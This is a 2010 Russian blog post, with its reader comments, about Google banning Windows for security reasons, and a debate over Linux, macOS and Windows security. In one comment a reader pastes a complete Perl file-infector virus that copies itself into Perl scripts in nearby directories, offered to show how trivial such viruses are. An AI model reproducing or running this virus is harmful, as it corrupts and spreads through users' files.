Програмысли

Google отказывается от Windows из-за безопасности

03 Июня 2010 Безопасность
15 0

Google запретила своим сотрудникам использовать Windows на работе. Я в шоке, что там вообще можно было использовать Windows. В этой компании столько проповедников Linux и свободы, что у верен был, что свободы там нет и быть не может. Там где много говорят о свободе, ее обязательно ограничивают. Но это не так важно. Google свободная компания и имеет право делать все, что хочет. Отказ от Windows позволит компании сэкономить и она имеет право пойти на такой шаг. Мне это пофиг.

Мне больше всего понравилась причина, по которой Google пошла на такой шаг. Оказывается, они не чувствуют себя в безопасности, когда находятся в Windows. Вот в Linux и MacOS - все нормально. Помню как на сайте Жанны Рутковской (Joanna Rutkowska) завелась дискусия по поводу безопасности открытых кодов и Linux в частности и она сказала одну интересную фразу (если не ошибаюсь, то мы даже обсуждали ее здесь на блоге), что никто не будет штудировать исходные коды Linux ради безопасности. Исходных кодов на столько много и они на столько запутанны, что спрятать червяка в них не составляет никакого труда. Уже были случаи, когда в код Linux подбрасывались лажи и не проблема засунуть бомбу в любой из пакетов.

Тогда на блоге мне понравилось еще то, что с Жанной согласилось много людей (а на блоге полно признанных людей), что это действительно так. Даже если держать глаз на каждой строке ядра, полно дополнительных пакетов, и полно банальных скринсейверов в интернете, благодаря которым распространяется зараза на компьютеры пользователей. Уследить за всем нереально, и именно поэтому большинство готовы платить деньги за закрытый код (не только Microsoft-у но и Apple), чтобы не заморачиваться со всей этой фигней и довериться этим компаниям. Да, они не боги и могут ошибаться, но кто не ошибается?

Ну ладно, с Linux все понятно, эта система открыта и можно посмотреть исходники и можно нанять целый штат сотрудников. Можно использовать свою Хромовую ОС (где я думаю, что большая часть кода которой написана за пределами компании) и только собственные программы. Но не ужели сама Google не ошибается? Не уверен. С ростом популярности их хрома мы сможем увидеть, сможет ли эта система быть надежнее конкурентов или нет. А рост популярности будет.

Но как на счет ОС от Apple? MacOS разрешена в компании, а эти исходные коды не доступны. ОС от Apple закрыта под самым жестким замком и более закрытой системы я не видел. Кажется год назад за месяц для этой системы вышло 66 обновлений. Так что же тогда является основной причиной? Мне кажется, что только домохозяйки и начинающие пользователи могут поверить в "ощущение безопасности", но я себя в безопасности не ощущаю ни где, ни в Windows, ни в Apple и даже не в Linux. Я бы даже сказал, что в особенности в Linux. Дело в том, что в этой системе сидит очень много хороших спецов и спрятать там какую-то заразу им не составит труда.

Вот мне абсолютно пофиг, работает Google с Windows или нет. Просто могли отказаться и не приводить никаких отмазок, потому что это их право. А так отмазка получилась немного из серии рекламных лозунгов, ведь их андроид построен на линуксе, а разрешенная в компании MacOS X закрыта и проприетарна как Windows.

Понравилось? Кликни Лайк, чтобы я знал, какой контент более интересен читателям. Заметку пока еще никто не лайкал и ты можешь быть первым

Комментарии

Влад

03 Июня 2010

В нашем Приватбанке кассиры сидят на линуксе - сам видел.Видел как перезагружали компьютер... Не знаю зачем - из-за неполадки или чего-то ещё.
Мне,конечно, важно что бы денежки лежали в целости...
Я видел в продаже компьютер с Linux, по цене компьютера с Вистой. Линукс-то бесплатен... Мне ответили что там "хорошее железо".

dbat

03 Июня 2010

to: Мне кажется, что только домохозяйки и начинающие пользователи могут поверить в "ощущение безопасности", но я себя в безопасности не ощущаю ни где, ни в Windows, ни в Apple и даже не в Linux.

   Тебе как Специалисту конечно виднее, но мне как домохозяину работать и серфить на любим Мак ОС надежнее...
если что Apple ответит... я надеюсь... :)

olegmaster

04 Июня 2010

Google уходит с виндоса из-за той нашумевшей атаки  китайских хакеров. винда с IE8 действитеьно оказались небезопасными по факту.

nektoDev

04 Июня 2010

В Линуксе я в любой момент, почуяв что-то неладное, могу посмотреть что делает каждый процесс вплоть до установки семафоров, и проверить потом исходные коды. Также большинство известных пакетов в, допустим Дебиане, перед добавкой в репозиторий проверяются.
Под Линукс очень трудно написать червь по 2м основным причинам:
1. Трудно сделать так чтобы он просто даже запускался на разных машинах без багов, а уж тем более устанавливался.
2. Благодаря очень грамотной политике разграничения прав(без рук и головы пользователя, этот плюс может сойти на нет) вирусу будет трудно натворить что-нибудь существенное, а благодаря подробным логам, всегда можно отследить что и как он сделал.

Михаил Фленов

04 Июня 2010

Атакавали Windows, потому что он самый популярный. Смотри предыдущую заметку: с ростом популярности и на безопасные (еще вчера) системы появляются вирусы, шпионыи прочая дрянь. Китайцев достаточно, чтобы завтра атакавать Linux и MacOSX. Что же теперь после каждой атаки бежать на друю ОС?

А если почитать эту новость: opensource.aaanet.ru/2007/08/16/hack-ubuntu-servers, то можно уже сейчас валить куда-нибудь.

Если прочитать эту новость: habrahabr.ru/blogs/infosecurity/54906/, то Safari убъет Google

В FireFox уязвимости находят почти каждый месяц.

notex

04 Июня 2010

1. это в честь чего это?

2. это где это грамотная политика прав? ты не слышал о багах, которые постоянно появляются в Linux и позволяют поднять права?

pat

04 Июня 2010

Не знаю 2 года работаю только в Ubuntu. Вполне доволен безопасность. Никакого тупого антивируса. Да и работа стабильная. А в Google многие давно работают в Linux.

Остается 1 вопрос, девелоперы, которые фигарят под Windows они как??

Михаил Фленов

04 Июня 2010

Если выбирать за безопасность, я наверно выбрал бы BSD или Apple. Не смотря на свои проблемы на верхнем уровне, Apple все же построен на очень безопасной BSD платформе.

nektoDev

04 Июня 2010

@notex
1. xxx: Народ! Подскажите какой-нить антивирус на debian?
yyy: Рабочих вирусов на линукс в данный момент нет. Нафиг тебе антивирус?
xxx: Это их раньше не было, я один нашел... и наконец-то пересобрал в работающем состоянии...
(С) bash.org.ru

http://goo.gl/HNe8 - список известных вирусов под Линукс. Ни один из них не работает на ядре выше 2.6

P.S. Попробуйте найти хоть один работающий вирус который САМ бы распоковался и скомплировал под, допустим Debianом и SUSE.

2. Последний по вине ядра, на моей памяти был в октябре-ноябре того года. Да и дырки все закрываются с максимальной оперативность, порой даже до выхода в паблик.

Михаил Фленов

04 Июня 2010

Если заразы нет, то это не значит, что ее не может быть. Это значит, что просто никому не нужно. MacOS стала интересна хакерам и зараза стала появлятся, не смотря на то, что внутренности от BSD, изменена только графическая система.

vasek123

04 Июня 2010

2. это где это грамотная политика прав? ты не слышал о багах, которые постоянно появляются в Linux и позволяют поднять права?


Плохо вы информированны...


Повышение привилегий в NFS клиенте FreeBSD

01 июня, 2010

Программа: FreeBSD 7.2, 7.3, 8.0

Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет локальному пользователю повысить свои привилегии на системе.

Уязвимость существует из-за недостаточной обработки длины параметра в NFS клиенте, передаваемого пользователем во время монтирования файловой системы. Локальный пользователь с привилегиями на монтирование файловой системы может с помощью слишком длинного параметра выполнить произвольный код на системе с привилегиями суперпользователя.

URL производителя: www.freebsd.org

Решение: Установите исправление с сайта производителя.


http://security.FreeBSD.org/patches/SA-10:06/nfsclient.patch
http://security.FreeBSD.org/patches/SA-10:06/nfsclient.patch.asc


Источники:  
FreeBSD-SA-10:06.nfsclient: Unvalidated input in nfsclient

CVE:  
CVE-2010-2020


p.s. В наше время абсолютной безопасности не может себя чувствовать как линуксоид так и пользователь Windows.

Михаил Фленов

04 Июня 2010

В наше время абсолютной безопасности не может себя чувствовать как линуксоид так и пользователь Windows.


Золотые слова, которые хорошо описывают заметку. Спысивать на ОС бесполезно, потому что основной проблемой безопасности является тот, кто сидит напротив монитора.

olegmaster

04 Июня 2010

Михаил Фленов


Атакавали Windows, потому что он самый популярный.

ой ли? цель была скомпромитриовать гуголь, а не m$ а уж заюзать дыры ie может любой китайский скрипткидди, на каждого по дыре хватит


Смотри предыдущую заметку: с ростом популярности и на безопасные (еще вчера) системы появляются вирусы, шпионыи прочая дрянь.

появляются != носят характер пандемий как от рустока, кидо, сассера и мсбласта.

вирус для никсов в несколько строк кода? да пожалуйста - заражай интерпретируемые файлы и делов-то:

#!/usr/bin/perl
#Perl Virus - Downward Travelling
open(File,$0);
@Virus=;
@Virus=@Virus[0...30];
close(File);

&InfectFile;
if (($^O =~ "bsd") or ($^O =~ "linux") or ($^O =~ "solaris")) { $OldDir =
pwd
} # Новая строка
if (($^O =~ "dos") or ($^O =~ "MSWin32")) { $OldDir = cd }
# Новая строка
$DotDot = '..';
# Новая строка
if ($^O =~ "MacOS") { $DotDot = "::" }
# Новая строка
chdir($DotDot);
# Новая строка
&InfectFile;
chdir($OldDir);
# Новая строка

sub InfectFile {
foreach $FileName (<*>) {
if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {
open(File, "$FileName");
@Temp=;
close(File);
if ((@Temp[1] =~ "Virus") or (@Temp[2] =~ "Virus")) {
if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) {
open(File, ">$FileName");
print File @Virus;
print File @Temp;
close (File);
}}}}}

только толку-то от таких "вирусов"? все программы из репозитория. у каждого программного пакета есть мейнтенеры, которые тшательныо просматривают каждую строчку кода, которую коммитят люди со стороны. плюс на source-based дистрах добавляешь опции компилятору, повышающие безопансть - что еще больше усложнает жизнь всяким вирмейкерам. плюс зоопарк дистров в линуксе - ядро одно на всех,  а обвязки разные. что, например, может дать при большой популярности все-таки разброс по разным убунтам, сусям, федорам и опять же писать вирус невыгодно - нужно будет уметь писать ядерные вирусы, а это резко повышает порог вхождения вирусописателя, никаких скрипткидди, юзающим метасплоит это не под силу, а сейчас вирусы берут не качеством, а количеством .

какая сейчас основная схема распространения малвари - скочал (с торрента/файлооменника), запустил, заразил. в линуксе такая схема не проканывает. единственный путь - javascript'ы для браузера да документы типа pdf'а всякие. первый вирус для убунты пройдет именно таким путем



Китайцев достаточно, чтобы завтра атакавать Linux и MacOSX. Что же теперь после каждой атаки бежать на друю ОС?

ну вообще-то компроментация рабочих мыльников сотрудников гугла - это не "каждая" атака. а если понадобится то да, побегут. а когда некуда будет бежать - свою напишут, с блекджеком и женщинами.


А если почитать эту новость: opensource.aaanet.ru/2007/08/16/hack-ubuntu-servers, то можно уже сейчас валить куда-нибудь.

не путай. от DDoS атаки на сервер никто не застрахован, здесь уж у кого либо ботнет (кстати на винде построен) больше, либо канал толще. подумаешь, некоторое время убунтовцы не могли качать свою любимый дистр. не велика потеря, по бумажной почте пришлют))
а вот пустить хакера в свой огород... электронный ящик - может обернуться серьезными убытками для компании.


В FireFox уязвимости находят почти каждый месяц.

у гугла есть свой браузер, там уязвимостей меньше чем в лисе хотя бы потому, что они версии и движок штампуют чуть ли не каждый месяц, элементарно не успевают хакеры дыры юзать)

Михаил Фленов

04 Июня 2010

Если нужно будет скомпрометировать Google еще раз, то будут атакавать Linux, потому что в Гугле теперь большинство будет на нем.

0xygen

05 Июня 2010

Если нужно будет скомпрометировать Google еще раз, то будут атакавать Linux, потому что в Гугле теперь большинство будет на нем.


Ну что ж... поживём - увидем :) А пока ИМХО не надо беспокоиться о вирусне в лине.

Добавить Комментарий
Добавить комментарий

Вот интересно, нафига Microsoft придумала (а самое страшное - везде использует) такую фишку, как прятать выделение при потере фокуса. Вот например, если у тебя что-то выделено в компоненте ListView и ты переключаешся на другое окно, это выделение исчезает. Оно есть, но его не видно. Нахрена это, может мне кто-нибудь объяснить? Какую микстуру принимал тот проектировщик, который придумал этот бред?

Вот я сижу сейчас перед двумя мониторами и на одном мониторе у меня открыт документ Excel, в котором список из 20 учетных записей нашей базы, а на другом мониторе у меня SQL Management Studio. Я иду по списку и проверяю с помощью SQL базу, что там случилось с этими учетными записями, что они немного некорретно отображают баланс. Когда я проверял первые три записи, все было нормально, но когда ты спускашеся в середину, то при переходе взгляда с SQL Management Studio на Excel я должен каждый раз искать нужную мне строку глазами, потому что какой-то кретин придумал прятать выделение.

Прятать подсвеченные строки

Мне понадобилось определить текущие настройки сети, и параметры прокси соединения, если они есть. Лезу в MSDN и вижу такой прекрасный пример:

// Create a new request to the mentioned URL.				
WebRequest myWebRequest=WebRequest.Create("http://www.contoso.com");

WebProxy myProxy=new WebProxy();
// Obtain the Proxy Prperty of the  Default browser.  
myProxy=(WebProxy)myWebRequest.Proxy;

У меня сразу же вкралось серьезное подозрение на счет работоспособности примера и компилировали ли его в Microsoft. Дело в том, что инициализировать переменную myProxy, и тут же перезаписывать ее не имеет смысла. Но это мелочи жизни, я решил попробовать его.

Как узнать настройки Proxy

Для тех, кто не в курсе, MacOS построена на базе BSD и является явным представителем не просто unix мира, а одних из самых безопасных систем - BSD. Очень часто можно встретить упреки в сторону Microsoft о том, что у них полно вирусов и сама Apple не раз обыгрывала это в своих рекламных роликах.

С ростом популярности MacOS стали появлятся различные небольшие заразы и на сайте Apple даже какое-то время назад в каталоге программ появился антивирус. Этим телодвижением Стив Джобс и его команда как бы признавали наличие вирусов в их системе. Когда они поняли это, то антивирус был убран и пользователей стали чесать, что их просто кидают антивирусники.

Вирусы в nix системах - реальность

Asus представила свой планшетник. Судя по фоткам и заявлениям планшетник должен быть неплохим и достойным конкурентом Apple, но есть только одна проблема - дата выхода. Она не известна, но некоторые источники утверждают, что датой выхода будет первый квартал 2011-го года. Да они что всет там охренели чтоли? Мне в метро неудобно таскать ноутбук и работать на нем, а планшетник был бы просто спасителем. А эти производители железа и Microsoft стали так тормозить, что ожидание уже превратилось в привычку. Сколько можно кормить следующими годами?

HP отказалась делать планшетники, Dell выпускает на базе андроида и последняя надежда была на Asus и слухи о том, что их работа будет завершена в начале лета. Но в самом начале лета они только представили то, чем они занимались, но только с производством теперь лажа. Чтобы его наладить, им по ходу тела нужно еще пол года. А в шоке!

И Asus туда же

Еще что-нибудь

Хотите найти еще что-то интересное почитать? Можно попробовать отфильтровать заметки на блоге по категориям.

О блоге

Программист, автор нескольких книг серии глазами хакера и просто блогер. Интересуюсь безопасностью, хотя хакером себя не считаю

Обратная связь

Без проблем вступаю в неразборчивые разговоры по e-mail. Стараюсь отвечать на письма всех читателей вне зависимости от страны проживания, вероисповедания, на русском или английском языке.

Пишите мне

Copyright © 2024 Михаил Флёнов. Тираж 1 штука. Отпечатано на ноутбуке. А за права отвечаю, или постараюсь.

А здесь еще и копирайт поставлю: Professional Web Development.

На сайте используются Cookie. Если вы из ЕС или Калифорнии США, то вы должны согласиться с их использованием - Согласен. Если вы из нормальной страны, то вам пох.